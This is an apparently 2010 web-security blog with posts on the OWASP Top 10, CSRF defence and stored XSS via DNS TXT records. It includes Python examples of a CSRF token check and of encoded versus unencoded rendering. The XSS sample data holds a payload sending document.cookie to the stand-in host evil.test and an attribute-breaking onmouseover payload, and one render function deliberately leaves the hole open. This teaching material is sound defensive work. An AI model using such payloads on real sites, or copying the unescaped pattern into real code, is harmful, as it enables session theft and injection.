Tuesday, April 20, 2010

OWASP Top10 Final Copy Released

OWASP (www.owasp.org) just released the final version of its Top 10 for 2010, the list of the ten most critical web application security risks. For those of you who have seen my talks on web app security, I was working off the Release Candidate, so you will want to read up on this final version.

http://www.owasp.org/index.php/Top_10

Friday, April 16, 2010

CSRF Big Deal or Not?

Great blog post on whether CSRF is a big deal or not.

http://ha.ckers.org/blog/20100414/csrf-isnt-a-big-deal-duh/

Read the post, and then read all the comments: great feedback, plus back-and-forth between folks in the field. The important thing is to keep this topic and others like it in our minds and share the knowledge with other developers. Only you can prevent forest fires...wait, I mean, web attacks.
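Since the point of the post is sharing the knowledge, here is the CSRF defense that the thread is arguing about, as an added example that is not code from the original post or from the linked article. It assumes a hypothetical banking app at the origin https://bank.example, an in-memory session store standing in for the framework's, and a request represented as a plain dict; the forged request is constructed to look like what a browser sends when an attacker's page auto-submits a form to the app (the session cookie rides along, the app's hidden token and Origin do not).

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed in-memory session store (session id -> session data). A real
# app keeps this server-side; what matters is that the CSRF token lives with
# the session and is never readable by a page on another origin.
SESSIONS = {}
TRUSTED_ORIGIN = "https://bank.example"   # assumed name for the app's own origin


def new_session():
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"csrf_token": secrets.token_urlsafe(32)}
    return sid


def form_token(sid):
    """Value the app embeds as a hidden field in every state-changing form."""
    return SESSIONS[sid]["csrf_token"]


def check_csrf(request):
    """Return (ok, reason) for a request dict with keys method, headers,
    cookies and form. Safe methods pass; everything else needs a session,
    a same-origin Origin/Referer header and the session's token."""
    if request["method"] in ("GET", "HEAD", "OPTIONS"):
        return True, "safe method"   # state changes must never hang off GET
    sess = SESSIONS.get(request["cookies"].get("session"))
    if sess is None:
        return False, "no session"
    # Defense in depth: a cross-site form post carries the attacker's origin,
    # never ours. Absence of both headers is treated as a failure here.
    origin = request["headers"].get("Origin") or request["headers"].get("Referer")
    if origin is None:
        return False, "missing Origin and Referer"
    parts = urlsplit(origin)
    if f"{parts.scheme}://{parts.netloc}" != TRUSTED_ORIGIN:
        return False, f"cross-site request from {parts.scheme}://{parts.netloc}"
    # Primary control, the synchronizer token: the attacker's page cannot read
    # our form, so it cannot supply the per-session value. Constant-time compare.
    submitted = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(submitted.encode(), sess["csrf_token"].encode()):
        return False, "bad or missing csrf_token"
    return True, "ok"


def legit_request(sid):
    """Constructed: the user submits the app's own transfer form."""
    return {"method": "POST",
            "headers": {"Origin": TRUSTED_ORIGIN},
            "cookies": {"session": sid},
            "form": {"csrf_token": form_token(sid), "to": "alice", "amount": "10"}}


def forged_request(sid):
    """Constructed: an attacker page on evil.test auto-submits the same form.
    The browser attaches the victim's cookie, but the token is missing and
    Origin names the attacker's site."""
    return {"method": "POST",
            "headers": {"Origin": "https://evil.test"},
            "cookies": {"session": sid},
            "form": {"to": "mallory", "amount": "1000"}}


def token_from_other_session(sid):
    """Constructed: attacker replays a token from their own session."""
    req = legit_request(sid)
    req["form"]["csrf_token"] = form_token(new_session())
    return req


if __name__ == "__main__":
    sid = new_session()
    for name, req in [("legit", legit_request(sid)),
                      ("forged", forged_request(sid)),
                      ("replayed token", token_from_other_session(sid))]:
        print(f"{name:15} -> {check_csrf(req)}")
```

The token is the control that actually stops the attack; the Origin/Referer check is cheap extra coverage, but some privacy tools strip Referer and old clients send neither, so rejecting on their absence is a policy choice to make deliberately. Putting the transfer on a POST is not optional either: a GET-driven state change is forgeable with nothing more than an image tag.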

Wednesday, April 7, 2010

New category of XSS attack -- so what?

DarkReading (http://www.darkreading.com/vulnerability_management/security/app-security/showArticle.jhtml?articleID=224201569) has a current article about a new type of XSS attack that exploits services that provide networking data: malicious script is stored in TXT records or other back-end data, returned by a lookup service, and then executed when it is displayed on a network administrator's screen.

Uh...this is no different from any other XSS attack. Sure, it's a new category. Sure, it's really tough to find. But hellooooo? You have input from an untrusted source (a data file, or a DNS record that anyone who controls that zone can write) and you are taking it and displaying it on a screen. That is stored XSS. Service developer, scrub your output! Network app screen developer, encode your output for the context you put it in, whether that is HTML body text, an attribute value, or JavaScript! Duh!!! Come on, people. This just shows that attackers are going to a deeper and deeper level in our systems. As we patch our brochureware sites, they move on to the network folks who never signed up to be security developers. But we have the responsibility to do it right.

And it is easy. Please encode and stop XSS!
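To make "encode your output" concrete, here is the pattern the article describes next to the fix, as an added example that is neither code from the article nor from any real network tool. The TXT records are constructed sample data, not real DNS; the lookup function stands in for a resolver or lookup-service call, and the two payloads target the two HTML contexts an admin screen typically drops a record into (body text and a quoted attribute).

```python
import html

# Constructed sample data, not real DNS. Whoever controls a zone can publish
# any text in its TXT records, so a record is attacker-controlled input to
# anything that displays it. The last two records are XSS payloads.
SAMPLE_TXT_RECORDS = {
    "example.test": [
        "v=spf1 include:_spf.example.test -all",
        '<script>new Image().src="http://evil.test/?c="+document.cookie</script>',
        '" onmouseover="alert(document.domain)',
    ],
}


def lookup_txt(domain):
    """Stand-in for a resolver or lookup-service call; returns raw records."""
    return list(SAMPLE_TXT_RECORDS.get(domain, []))


def render_vulnerable(domain):
    """The pattern the article describes: record text dropped straight into the
    admin screen's HTML, once in a title attribute and once as body text."""
    cells = "".join(
        f'<td title="{record}">{record}</td>' for record in lookup_txt(domain)
    )
    return f"<table><tr><th>{domain}</th>{cells}</tr></table>"


def render_encoded(domain):
    """Same screen with every untrusted value encoded for where it lands.
    html.escape(quote=True) turns & < > " ' into entities, which is the right
    encoding for HTML body text and for a quoted attribute value. The
    attribute must also stay quoted in the template; encoding alone does not
    rescue an unquoted attribute."""
    cells = "".join(
        f'<td title="{html.escape(record, quote=True)}">'
        f"{html.escape(record, quote=True)}</td>"
        for record in lookup_txt(domain)
    )
    return f"<table><tr><th>{html.escape(domain, quote=True)}</th>{cells}</tr></table>"


def payload_survives(rendered):
    """Crude check: a raw script tag, or a raw quote that closes an attribute
    and opens an event handler, means record text reached the browser as
    markup instead of as data."""
    return "<script" in rendered or '" onmouseover="' in rendered


if __name__ == "__main__":
    for name, render in [("vulnerable", render_vulnerable), ("encoded", render_encoded)]:
        page = render("example.test")
        print(f"{name:10} payload survives: {payload_survives(page)}")
        print(page)
```

Note that the encoded version loses nothing: the admin still sees the literal `<script>` text in the cell, which is exactly what they need in order to notice that someone planted it. The service in the middle has its own job, which is to hand the record back as data (for example as a JSON string field) rather than as a fragment of pre-built HTML, so that the screen that finally displays it is the one place doing the encoding.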